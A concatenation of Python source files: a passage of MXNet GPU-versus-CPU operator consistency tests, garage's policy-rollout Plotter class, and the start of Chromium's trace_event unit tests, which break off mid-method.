check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
sym = mx.sym.Activation(name='act', act_type='sigmoid')
ctx_list = [{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/8288")
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='lstm', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(100, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_offset': (2, 18, 7, 7),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
name='deformable_conv')
@with_seed()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_rnn_layer():
check_rnn_layer(gluon.rnn.RNN(100, num_layers=3))
check_rnn_layer(gluon.rnn.RNN(100, activation='tanh', num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3))
check_rnn_layer(gluon.rnn.GRU(100, num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@unittest.skip("Test fails intermittently. Temporarily disabled until fixed. Tracked at https://github.com/apache/incubator-mxnet/issues/8211")
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_gluon_ctc_consistency():
loss = mx.gluon.loss.CTCLoss()
data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))
cpu_data = data.copy().as_in_context(mx.cpu(0))
cpu_data.attach_grad()
with mx.autograd.record():
l_cpu = loss(cpu_data, cpu_label)
l_cpu.backward()
gpu_data = data.copyto(mx.gpu(0))
gpu_data.attach_grad()
with mx.autograd.record():
l_gpu = loss(gpu_data, gpu_label)
l_gpu.backward()
assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_global_norm_clip_multi_device():
x1 = mx.nd.ones((3,3), ctx=mx.gpu(0))
x2 = mx.nd.ones((4,4), ctx=mx.cpu(0))
norm = gluon.utils.clip_global_norm([x1, x2], 1.0)
assert norm == 5.0
assert_almost_equal(x1.asnumpy(), np.ones((3,3))/5)
assert_almost_equal(x2.asnumpy(), np.ones((4,4))/5)
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_score = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_score = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 20)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
if __name__ == '__main__':
import nose
nose.runmodule()
|
plotter.py
|
"""Visualizes a policy running in an environment, in parallel with training."""
import atexit
from collections import namedtuple
from enum import Enum
from multiprocessing import JoinableQueue, Process
import platform
from threading import Thread
import numpy as np
from garage.sampler.utils import rollout
__all__ = ['Plotter']
class Op(Enum):
"""Messages for the Plotter state machine."""
STOP = 0
UPDATE = 1
DEMO = 2
Message = namedtuple('Message', ['op', 'args', 'kwargs'])
class Plotter:
"""Visualizes a policy in an environment."""
# Static variable used to disable the plotter
enable = True
# List containing all plotters instantiated in the process
__plotters = []
def __init__(self):
Plotter.__plotters.append(self)
self._process = None
self._queue = None
def _worker_start(self):
env = None
policy = None
max_length = None
initial_rollout = True
try:
# Each iteration will process ALL messages currently in the
# queue
while True:
msgs = {}
# If true, block and yield processor
if initial_rollout:
msg = self._queue.get()
msgs[msg.op] = msg
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get()
msgs[msg.op] = msg
else:
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get_nowait()
msgs[msg.op] = msg
if Op.STOP in msgs:
break
if Op.UPDATE in msgs:
env, policy = msgs[Op.UPDATE].args
elif Op.DEMO in msgs:
param_values, max_length = msgs[Op.DEMO].args
policy.set_param_values(param_values)
initial_rollout = False
rollout(env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
else:
if max_length:
rollout(env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
except KeyboardInterrupt:
pass
def close(self):
"""Stop the plotter."""
if not Plotter.enable:
return
if self._process and self._process.is_alive():
while not self._queue.empty():
self._queue.get()
self._queue.task_done()
self._queue.put(Message(op=Op.STOP, args=None, kwargs=None))
self._queue.close()
self._process.join()
@staticmethod
def disable():
"""Disable all instances of the Plotter class."""
Plotter.enable = False
@staticmethod
def _get_plotters():
"""Get all instances of Plotter.
Returns:
List[Plotter]: All instances of Plotter.
"""
return Plotter.__plotters
def _init_worker(self):
if not Plotter.enable:
return
self._queue = JoinableQueue()
if 'Darwin' in platform.platform():
self._process = Thread(target=self._worker_start)
else:
self._process = Process(target=self._worker_start)
self._process.daemon = True
self._process.start()
atexit.register(self.close)
def init_plot(self, env, policy):
"""Initialize the plotter.
Args:
env (GarageEnv): Environment to visualize.
policy (garage.np.policies.Policy): Policy to roll out in the
visualization.
"""
if not Plotter.enable:
return
if not (self._process and self._queue):
self._init_worker()
# Needed in order to draw glfw window on the main thread
if 'Darwin' in platform.platform():
rollout(env,
policy,
max_path_length=np.inf,
animated=True,
speedup=5)
self._queue.put(Message(op=Op.UPDATE, args=(env, policy), kwargs=None))
def update_plot(self, policy, max_length=np.inf):
"""Update the plotter.
Args:
policy (garage.np.policies.Policy): New policy to roll out in the
visualization.
max_length (int): Maximum number of steps to roll out.
"""
if not Plotter.enable:
return
self._queue.put(
Message(op=Op.DEMO,
args=(policy.get_param_values(), max_length),
kwargs=None))
|
trace_event_unittest.py
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import contextlib
import json
import logging
import math
import multiprocessing
import os
import time
import unittest
import sys
from py_trace_event import trace_event
from py_trace_event import trace_time
from py_trace_event.trace_event_impl import log
from py_trace_event.trace_event_impl import multiprocessing_shim
from py_utils import tempfile_ext
class TraceEventTests(unittest.TestCase):
@contextlib.contextmanager
def _test_trace(self, disable=True, format=None):
with tempfile_ext.TemporaryFileName() as filename:
self._log_path = filename
try:
trace_event.trace_enable(self._log_path, format=format)
yield
finally:
if disable:
trace_event.trace_disable()
def testNoImpl(self):
orig_impl = trace_event.trace_event_impl
try:
trace_event.trace_event_impl = None
self.assertFalse(trace_event.trace_can_enable())
finally:
trace_event.trace_event_impl = orig_impl
def testImpl(self):
self.assertTrue(trace_event.trace_can_enable())
def testIsEnabledFalse(self):
self.assertFalse(trace_event.trace_is_enabled())
def testIsEnabledTrue(self):
with self._test_trace():
self.assertTrue(trace_event.trace_is_enabled())
def testEnable(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 1)
self.assertTrue(trace_event.trace_is_enabled())
log_output = log_output.pop()
self.assertEquals(log_output['category'], 'process_argv')
self.assertEquals(log_output['name'], 'process_argv')
self.assertTrue(log_output['args']['argv'])
self.assertEquals(log_output['ph'], 'M')
def testDoubleEnable(self):
try:
